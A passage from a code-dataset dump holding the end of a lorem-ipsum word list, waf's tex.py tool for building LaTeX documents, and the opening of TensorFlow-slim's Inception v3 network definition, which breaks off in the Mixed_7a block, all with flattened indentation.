hendrerit hymenaeos iaculis id imperdiet in inceptos integer interdum ipsum
justo lacinia lacus laoreet lectus leo libero ligula litora lobortis lorem
luctus maecenas magna magnis malesuada massa mattis mauris metus mi molestie
mollis montes morbi mus nam nascetur natoque nec neque netus nibh nisi nisl non
nonummy nostra nulla nullam nunc odio orci ornare parturient pede pellentesque
penatibus per pharetra phasellus placerat platea porta porttitor posuere
potenti praesent pretium primis proin pulvinar purus quam quis quisque rhoncus
ridiculus risus rutrum sagittis sapien scelerisque sed sem semper senectus sit
sociis sociosqu sodales sollicitudin suscipit suspendisse taciti tellus tempor
tempus tincidunt torquent tortor tristique turpis ullamcorper ultrices
ultricies urna ut varius vehicula vel velit venenatis vestibulum vitae vivamus
viverra volutpat vulputate'''
| gpl-3.0 |
fauferoth/assignment | .mywaflib/waflib/Tools/tex.py | 4 | 14765 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
TeX/LaTeX/PDFLaTeX/XeLaTeX support
Example::
def configure(conf):
conf.load('tex')
if not conf.env.LATEX:
			conf.fatal('The program LaTeX is required')
def build(bld):
bld(
features = 'tex',
type = 'latex', # pdflatex or xelatex
source = 'document.ltx', # mandatory, the source
outs = 'ps', # 'pdf' or 'ps pdf'
deps = 'crossreferencing.lst', # to give dependencies directly
prompt = 1, # 0 for the batch mode
)
Notes:
- To configure with a special program, use::
$ PDFLATEX=luatex waf configure
- This tool doesn't use the target attribute of the task generator
(``bld(target=...)``); the target file name is built from the source
base name and the out type(s)
"""
import os, re
from waflib import Utils, Task, Errors, Logs, Node
from waflib.TaskGen import feature, before_method
re_bibunit = re.compile(r'\\(?P<type>putbib)\[(?P<file>[^\[\]]*)\]',re.M)
def bibunitscan(self):
"""
Parse the inputs and try to find the *bibunit* dependencies
:return: list of bibunit files
:rtype: list of :py:class:`waflib.Node.Node`
"""
node = self.inputs[0]
nodes = []
if not node: return nodes
code = node.read()
for match in re_bibunit.finditer(code):
path = match.group('file')
if path:
for k in ('', '.bib'):
# add another loop for the tex include paths?
Logs.debug('tex: trying %s%s' % (path, k))
fi = node.parent.find_resource(path + k)
if fi:
nodes.append(fi)
# no break, people are crazy
else:
Logs.debug('tex: could not find %s' % path)
Logs.debug("tex: found the following bibunit files: %s" % nodes)
return nodes
exts_deps_tex = ['', '.ltx', '.tex', '.bib', '.pdf', '.png', '.eps', '.ps', '.sty']
"""List of typical file extensions included in latex files"""
exts_tex = ['.ltx', '.tex']
"""List of typical file extensions that contain latex"""
re_tex = re.compile(r'\\(?P<type>usepackage|RequirePackage|include|bibliography([^\[\]{}]*)|putbib|includegraphics|input|import|bringin|lstinputlisting)(\[[^\[\]]*\])?{(?P<file>[^{}]*)}',re.M)
"""Regexp for expressions that may include latex files"""
g_bibtex_re = re.compile('bibdata', re.M)
"""Regexp for bibtex files"""
g_glossaries_re = re.compile('\\@newglossary', re.M)
"""Regexp for expressions that create glossaries"""
class tex(Task.Task):
"""
Compile a tex/latex file.
.. inheritance-diagram:: waflib.Tools.tex.latex waflib.Tools.tex.xelatex waflib.Tools.tex.pdflatex
"""
bibtex_fun, _ = Task.compile_fun('${BIBTEX} ${BIBTEXFLAGS} ${SRCFILE}', shell=False)
bibtex_fun.__doc__ = """
Execute the program **bibtex**
"""
makeindex_fun, _ = Task.compile_fun('${MAKEINDEX} ${MAKEINDEXFLAGS} ${SRCFILE}', shell=False)
makeindex_fun.__doc__ = """
Execute the program **makeindex**
"""
makeglossaries_fun, _ = Task.compile_fun('${MAKEGLOSSARIES} ${SRCFILE}', shell=False)
makeglossaries_fun.__doc__ = """
Execute the program **makeglossaries**
"""
def exec_command(self, cmd, **kw):
"""
Override :py:meth:`waflib.Task.Task.exec_command` to execute the command without buffering (latex may prompt for inputs)
:return: the return code
:rtype: int
"""
bld = self.generator.bld
Logs.info('runner: %r' % cmd)
try:
if not kw.get('cwd', None):
kw['cwd'] = bld.cwd
except AttributeError:
bld.cwd = kw['cwd'] = bld.variant_dir
return Utils.subprocess.Popen(cmd, **kw).wait()
def scan_aux(self, node):
"""
A recursive regex-based scanner that finds included auxiliary files.
"""
nodes = [node]
re_aux = re.compile(r'\\@input{(?P<file>[^{}]*)}', re.M)
def parse_node(node):
code = node.read()
for match in re_aux.finditer(code):
path = match.group('file')
found = node.parent.find_or_declare(path)
if found and found not in nodes:
Logs.debug('tex: found aux node ' + found.abspath())
nodes.append(found)
parse_node(found)
parse_node(node)
return nodes
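	# Illustrative note: a line such as \@input{chap1.aux} inside the main .aux
	# file causes chap1.aux to be added, recursively, to the list returned by
	# scan_aux above.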
def scan(self):
"""
A recursive regex-based scanner that finds latex dependencies. It uses :py:attr:`waflib.Tools.tex.re_tex`
Depending on your needs you might want:
* to change re_tex::
from waflib.Tools import tex
tex.re_tex = myregex
* or to change the method scan from the latex tasks::
from waflib.Task import classes
classes['latex'].scan = myscanfunction
"""
node = self.inputs[0]
nodes = []
names = []
seen = []
if not node: return (nodes, names)
def parse_node(node):
if node in seen:
return
seen.append(node)
code = node.read()
global re_tex
for match in re_tex.finditer(code):
multibib = match.group('type')
if multibib and multibib.startswith('bibliography'):
multibib = multibib[len('bibliography'):]
if multibib.startswith('style'):
continue
else:
multibib = None
for path in match.group('file').split(','):
if path:
add_name = True
found = None
for k in exts_deps_tex:
# issue 1067, scan in all texinputs folders
for up in self.texinputs_nodes:
Logs.debug('tex: trying %s%s' % (path, k))
found = up.find_resource(path + k)
if found:
break
for tsk in self.generator.tasks:
if not found or found in tsk.outputs:
break
else:
nodes.append(found)
add_name = False
for ext in exts_tex:
if found.name.endswith(ext):
parse_node(found)
break
# multibib stuff
if found and multibib and found.name.endswith('.bib'):
try:
self.multibibs.append(found)
except AttributeError:
self.multibibs = [found]
# no break, people are crazy
if add_name:
names.append(path)
parse_node(node)
for x in nodes:
x.parent.get_bld().mkdir()
Logs.debug("tex: found the following : %s and names %s" % (nodes, names))
return (nodes, names)
def check_status(self, msg, retcode):
"""
Check an exit status and raise an error with a particular message
:param msg: message to display if the code is non-zero
:type msg: string
:param retcode: condition
:type retcode: boolean
"""
if retcode != 0:
raise Errors.WafError("%r command exit status %r" % (msg, retcode))
def bibfile(self):
"""
Parse the *.aux* files to find bibfiles to process.
If yes, execute :py:meth:`waflib.Tools.tex.tex.bibtex_fun`
"""
for aux_node in self.aux_nodes:
try:
ct = aux_node.read()
except EnvironmentError:
				Logs.error('Error reading %s' % aux_node.abspath())
continue
if g_bibtex_re.findall(ct):
Logs.info('calling bibtex')
self.env.env = {}
self.env.env.update(os.environ)
self.env.env.update({'BIBINPUTS': self.texinputs(), 'BSTINPUTS': self.texinputs()})
self.env.SRCFILE = aux_node.name[:-4]
self.check_status('error when calling bibtex', self.bibtex_fun())
for node in getattr(self, 'multibibs', []):
self.env.env = {}
self.env.env.update(os.environ)
self.env.env.update({'BIBINPUTS': self.texinputs(), 'BSTINPUTS': self.texinputs()})
self.env.SRCFILE = node.name[:-4]
self.check_status('error when calling bibtex', self.bibtex_fun())
def bibunits(self):
"""
Parse the *.aux* file to find bibunit files. If there are bibunit files,
execute :py:meth:`waflib.Tools.tex.tex.bibtex_fun`.
"""
try:
bibunits = bibunitscan(self)
except OSError:
Logs.error('error bibunitscan')
else:
if bibunits:
fn = ['bu' + str(i) for i in range(1, len(bibunits) + 1)]
if fn:
Logs.info('calling bibtex on bibunits')
for f in fn:
self.env.env = {'BIBINPUTS': self.texinputs(), 'BSTINPUTS': self.texinputs()}
self.env.SRCFILE = f
self.check_status('error when calling bibtex', self.bibtex_fun())
def makeindex(self):
"""
Look on the filesystem if there is a *.idx* file to process. If yes, execute
:py:meth:`waflib.Tools.tex.tex.makeindex_fun`
"""
self.idx_node = self.inputs[0].change_ext('.idx')
try:
idx_path = self.idx_node.abspath()
os.stat(idx_path)
except OSError:
Logs.info('index file %s absent, not calling makeindex' % idx_path)
else:
Logs.info('calling makeindex')
self.env.SRCFILE = self.idx_node.name
self.env.env = {}
self.check_status('error when calling makeindex %s' % idx_path, self.makeindex_fun())
def bibtopic(self):
"""
Additional .aux files from the bibtopic package
"""
p = self.inputs[0].parent.get_bld()
if os.path.exists(os.path.join(p.abspath(), 'btaux.aux')):
self.aux_nodes += p.ant_glob('*[0-9].aux')
def makeglossaries(self):
src_file = self.inputs[0].abspath()
base_file = os.path.basename(src_file)
base, _ = os.path.splitext(base_file)
for aux_node in self.aux_nodes:
try:
ct = aux_node.read()
except EnvironmentError as e:
Logs.error('Error reading %s: %r' % (aux_node.abspath(), e))
continue
if g_glossaries_re.findall(ct):
if not self.env.MAKEGLOSSARIES:
raise Errors.WafError("The program 'makeglossaries' is missing!")
Logs.warn('calling makeglossaries')
self.env.SRCFILE = base
self.check_status('error when calling makeglossaries %s' % base, self.makeglossaries_fun())
return
def texinputs(self):
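# Build the search path fed to TEXINPUTS/BIBINPUTS/BSTINPUTS; the trailing
# os.pathsep keeps the compiler's built-in default search paths active.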
return os.pathsep.join([k.abspath() for k in self.texinputs_nodes]) + os.pathsep
def run(self):
"""
Runs the TeX build process.
It may require multiple passes, depending on the use of cross-references,
bibliographies, and other content that can trigger reruns.
The appropriate TeX compiler is called until the *.aux* files stop changing.
Makeindex and bibtex are called if necessary.
"""
env = self.env
if not env['PROMPT_LATEX']:
env.append_value('LATEXFLAGS', '-interaction=batchmode')
env.append_value('PDFLATEXFLAGS', '-interaction=batchmode')
env.append_value('XELATEXFLAGS', '-interaction=batchmode')
# important, set the cwd for everybody
self.cwd = self.inputs[0].parent.get_bld().abspath()
Logs.info('first pass on %s' % self.__class__.__name__)
# Hash .aux files before even calling the LaTeX compiler
cur_hash = self.hash_aux_nodes()
self.call_latex()
# Find the .aux files again since bibtex processing can require it
self.hash_aux_nodes()
self.bibtopic()
self.bibfile()
self.bibunits()
self.makeindex()
self.makeglossaries()
for i in range(10):
# There is no need to call latex again if the .aux hash value has not changed
prev_hash = cur_hash
cur_hash = self.hash_aux_nodes()
if not cur_hash:
Logs.error('No .aux files to process')
if cur_hash and cur_hash == prev_hash:
break
# run the command
Logs.info('calling %s' % self.__class__.__name__)
self.call_latex()
def hash_aux_nodes(self):
try:
self.aux_nodes
except AttributeError:
try:
self.aux_nodes = self.scan_aux(self.inputs[0].change_ext('.aux'))
except IOError:
return None
return Utils.h_list([Utils.h_file(x.abspath()) for x in self.aux_nodes])
def call_latex(self):
self.env.env = {}
self.env.env.update(os.environ)
self.env.env.update({'TEXINPUTS': self.texinputs()})
self.env.SRCFILE = self.inputs[0].abspath()
self.check_status('error when calling latex', self.texfun())
class latex(tex):
texfun, vars = Task.compile_fun('${LATEX} ${LATEXFLAGS} ${SRCFILE}', shell=False)
class pdflatex(tex):
texfun, vars = Task.compile_fun('${PDFLATEX} ${PDFLATEXFLAGS} ${SRCFILE}', shell=False)
class xelatex(tex):
texfun, vars = Task.compile_fun('${XELATEX} ${XELATEXFLAGS} ${SRCFILE}', shell=False)
class dvips(Task.Task):
run_str = '${DVIPS} ${DVIPSFLAGS} ${SRC} -o ${TGT}'
color = 'BLUE'
after = ['latex', 'pdflatex', 'xelatex']
class dvipdf(Task.Task):
run_str = '${DVIPDF} ${DVIPDFFLAGS} ${SRC} ${TGT}'
color = 'BLUE'
after = ['latex', 'pdflatex', 'xelatex']
class pdf2ps(Task.Task):
run_str = '${PDF2PS} ${PDF2PSFLAGS} ${SRC} ${TGT}'
color = 'BLUE'
after = ['latex', 'pdflatex', 'xelatex']
@feature('tex')
@before_method('process_source')
def apply_tex(self):
"""
Create :py:class:`waflib.Tools.tex.tex` objects, and dvips/dvipdf/pdf2ps tasks if necessary (outs='ps', etc).
"""
if not getattr(self, 'type', None) in ('latex', 'pdflatex', 'xelatex'):
self.type = 'pdflatex'
outs = Utils.to_list(getattr(self, 'outs', []))
# prompt for incomplete files (else the batchmode is used)
self.env['PROMPT_LATEX'] = getattr(self, 'prompt', 1)
deps_lst = []
if getattr(self, 'deps', None):
deps = self.to_list(self.deps)
for dep in deps:
if isinstance(dep, str):
n = self.path.find_resource(dep)
if not n:
self.bld.fatal('Could not find %r for %r' % (dep, self))
if not n in deps_lst:
deps_lst.append(n)
elif isinstance(dep, Node.Node):
deps_lst.append(dep)
for node in self.to_nodes(self.source):
if self.type == 'latex':
task = self.create_task('latex', node, node.change_ext('.dvi'))
elif self.type == 'pdflatex':
task = self.create_task('pdflatex', node, node.change_ext('.pdf'))
elif self.type == 'xelatex':
task = self.create_task('xelatex', node, node.change_ext('.pdf'))
task.env = self.env
# add the manual dependencies
if deps_lst:
for n in deps_lst:
if not n in task.dep_nodes:
task.dep_nodes.append(n)
# texinputs is a nasty beast
if hasattr(self, 'texinputs_nodes'):
task.texinputs_nodes = self.texinputs_nodes
else:
task.texinputs_nodes = [node.parent, node.parent.get_bld(), self.path, self.path.get_bld()]
lst = os.environ.get('TEXINPUTS', '')
if self.env.TEXINPUTS:
lst += os.pathsep + self.env.TEXINPUTS
if lst:
lst = lst.split(os.pathsep)
for x in lst:
if x:
if os.path.isabs(x):
p = self.bld.root.find_node(x)
if p:
task.texinputs_nodes.append(p)
else:
Logs.error('Invalid TEXINPUTS folder %s' % x)
else:
Logs.error('Cannot resolve relative paths in TEXINPUTS %s' % x)
if self.type == 'latex':
if 'ps' in outs:
tsk = self.create_task('dvips', task.outputs, node.change_ext('.ps'))
tsk.env.env = dict(os.environ)
if 'pdf' in outs:
tsk = self.create_task('dvipdf', task.outputs, node.change_ext('.pdf'))
tsk.env.env = dict(os.environ)
elif self.type == 'pdflatex':
if 'ps' in outs:
self.create_task('pdf2ps', task.outputs, node.change_ext('.ps'))
self.source = []
def configure(self):
"""
Try to find the programs tex, latex and others. Do not raise any error if they
are not found.
"""
v = self.env
for p in 'tex latex pdflatex xelatex bibtex dvips dvipdf ps2pdf makeindex pdf2ps makeglossaries'.split():
try:
self.find_program(p, var=p.upper())
except self.errors.ConfigurationError:
pass
v['DVIPSFLAGS'] = '-Ppdf'
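# A minimal customization sketch (illustrative, not part of this tool): the
# scanner regex and the scan method can be overridden from a wscript, as the
# scan() docstring above suggests. The regex and `my_scan` are assumptions;
# any replacement regex must keep the named groups 'type' and 'file' that
# scan() reads via match.group().
#
# import re
# from waflib.Tools import tex
# from waflib.Task import classes
#
# tex.re_tex = re.compile(r'\\(?P<type>include|input)(\[[^\[\]]*\])?{(?P<file>[^{}]*)}', re.M)
# def my_scan(self):
#     return ([], [])  # report no dependencies at all
# classes['latex'].scan = my_scan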
| bsd-3-clause |
mengxn/tensorflow | tensorflow/contrib/slim/python/slim/nets/inception_v3.py | 89 | 30528 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains the definition for inception v3 classification network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.contrib.framework.python.ops import arg_scope
from tensorflow.contrib.layers.python.layers import layers as layers_lib
from tensorflow.contrib.layers.python.layers import regularizers
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import variable_scope
trunc_normal = lambda stddev: init_ops.truncated_normal_initializer(0.0, stddev)
def inception_v3_base(inputs,
final_endpoint='Mixed_7c',
min_depth=16,
depth_multiplier=1.0,
scope=None):
"""Inception model from http://arxiv.org/abs/1512.00567.
Constructs an Inception v3 network from inputs to the given final endpoint.
This method can construct the network up to the final inception block
Mixed_7c.
Note that the names of the layers in the paper do not correspond to the names
of the endpoints registered by this function although they build the same
network.
Here is a mapping from the old_names to the new names:
Old name | New name
=======================================
conv0 | Conv2d_1a_3x3
conv1 | Conv2d_2a_3x3
conv2 | Conv2d_2b_3x3
pool1 | MaxPool_3a_3x3
conv3 | Conv2d_3b_1x1
conv4 | Conv2d_4a_3x3
pool2 | MaxPool_5a_3x3
mixed_35x35x256a | Mixed_5b
mixed_35x35x288a | Mixed_5c
mixed_35x35x288b | Mixed_5d
mixed_17x17x768a | Mixed_6a
mixed_17x17x768b | Mixed_6b
mixed_17x17x768c | Mixed_6c
mixed_17x17x768d | Mixed_6d
mixed_17x17x768e | Mixed_6e
mixed_8x8x1280a | Mixed_7a
mixed_8x8x2048a | Mixed_7b
mixed_8x8x2048b | Mixed_7c
Args:
inputs: a tensor of size [batch_size, height, width, channels].
final_endpoint: specifies the endpoint to construct the network up to. It
can be one of ['Conv2d_1a_3x3', 'Conv2d_2a_3x3', 'Conv2d_2b_3x3',
'MaxPool_3a_3x3', 'Conv2d_3b_1x1', 'Conv2d_4a_3x3', 'MaxPool_5a_3x3',
'Mixed_5b', 'Mixed_5c', 'Mixed_5d', 'Mixed_6a', 'Mixed_6b', 'Mixed_6c',
'Mixed_6d', 'Mixed_6e', 'Mixed_7a', 'Mixed_7b', 'Mixed_7c'].
min_depth: Minimum depth value (number of channels) for all convolution ops.
Enforced when depth_multiplier < 1, and not an active constraint when
depth_multiplier >= 1.
depth_multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
scope: Optional variable_scope.
Returns:
tensor_out: output tensor corresponding to the final_endpoint.
end_points: a set of activations for external use, for example summaries or
losses.
Raises:
ValueError: if final_endpoint is not set to one of the predefined values,
or depth_multiplier <= 0
"""
# end_points will collect relevant activations for external use, for example
# summaries or losses.
end_points = {}
if depth_multiplier <= 0:
raise ValueError('depth_multiplier is not greater than zero.')
depth = lambda d: max(int(d * depth_multiplier), min_depth)
with variable_scope.variable_scope(scope, 'InceptionV3', [inputs]):
with arg_scope(
[layers.conv2d, layers_lib.max_pool2d, layers_lib.avg_pool2d],
stride=1,
padding='VALID'):
# 299 x 299 x 3
end_point = 'Conv2d_1a_3x3'
net = layers.conv2d(inputs, depth(32), [3, 3], stride=2, scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 149 x 149 x 32
end_point = 'Conv2d_2a_3x3'
net = layers.conv2d(net, depth(32), [3, 3], scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 147 x 147 x 32
end_point = 'Conv2d_2b_3x3'
net = layers.conv2d(
net, depth(64), [3, 3], padding='SAME', scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 147 x 147 x 64
end_point = 'MaxPool_3a_3x3'
net = layers_lib.max_pool2d(net, [3, 3], stride=2, scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 73 x 73 x 64
end_point = 'Conv2d_3b_1x1'
net = layers.conv2d(net, depth(80), [1, 1], scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 73 x 73 x 80.
end_point = 'Conv2d_4a_3x3'
net = layers.conv2d(net, depth(192), [3, 3], scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 71 x 71 x 192.
end_point = 'MaxPool_5a_3x3'
net = layers_lib.max_pool2d(net, [3, 3], stride=2, scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 35 x 35 x 192.
# Inception blocks
with arg_scope(
[layers.conv2d, layers_lib.max_pool2d, layers_lib.avg_pool2d],
stride=1,
padding='SAME'):
# mixed: 35 x 35 x 256.
end_point = 'Mixed_5b'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(48), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(64), [5, 5], scope='Conv2d_0b_5x5')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0c_3x3')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(32), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_1: 35 x 35 x 288.
end_point = 'Mixed_5c'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(48), [1, 1], scope='Conv2d_0b_1x1')
branch_1 = layers.conv2d(
branch_1, depth(64), [5, 5], scope='Conv_1_0c_5x5')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0c_3x3')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(64), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_2: 35 x 35 x 288.
end_point = 'Mixed_5d'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(48), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(64), [5, 5], scope='Conv2d_0b_5x5')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0c_3x3')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(64), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_3: 17 x 17 x 768.
end_point = 'Mixed_6a'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net,
depth(384), [3, 3],
stride=2,
padding='VALID',
scope='Conv2d_1a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(96), [3, 3], scope='Conv2d_0b_3x3')
branch_1 = layers.conv2d(
branch_1,
depth(96), [3, 3],
stride=2,
padding='VALID',
scope='Conv2d_1a_1x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers_lib.max_pool2d(
net, [3, 3], stride=2, padding='VALID', scope='MaxPool_1a_3x3')
net = array_ops.concat([branch_0, branch_1, branch_2], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed4: 17 x 17 x 768.
end_point = 'Mixed_6b'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(128), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(128), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(128), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(128), [7, 1], scope='Conv2d_0b_7x1')
branch_2 = layers.conv2d(
branch_2, depth(128), [1, 7], scope='Conv2d_0c_1x7')
branch_2 = layers.conv2d(
branch_2, depth(128), [7, 1], scope='Conv2d_0d_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0e_1x7')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_5: 17 x 17 x 768.
end_point = 'Mixed_6c'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(160), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(160), [7, 1], scope='Conv2d_0b_7x1')
branch_2 = layers.conv2d(
branch_2, depth(160), [1, 7], scope='Conv2d_0c_1x7')
branch_2 = layers.conv2d(
branch_2, depth(160), [7, 1], scope='Conv2d_0d_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0e_1x7')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_6: 17 x 17 x 768.
end_point = 'Mixed_6d'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(160), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(160), [7, 1], scope='Conv2d_0b_7x1')
branch_2 = layers.conv2d(
branch_2, depth(160), [1, 7], scope='Conv2d_0c_1x7')
branch_2 = layers.conv2d(
branch_2, depth(160), [7, 1], scope='Conv2d_0d_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0e_1x7')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_7: 17 x 17 x 768.
end_point = 'Mixed_6e'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(192), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [7, 1], scope='Conv2d_0b_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0c_1x7')
branch_2 = layers.conv2d(
branch_2, depth(192), [7, 1], scope='Conv2d_0d_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0e_1x7')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_8: 8 x 8 x 1280.
end_point = 'Mixed_7a'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
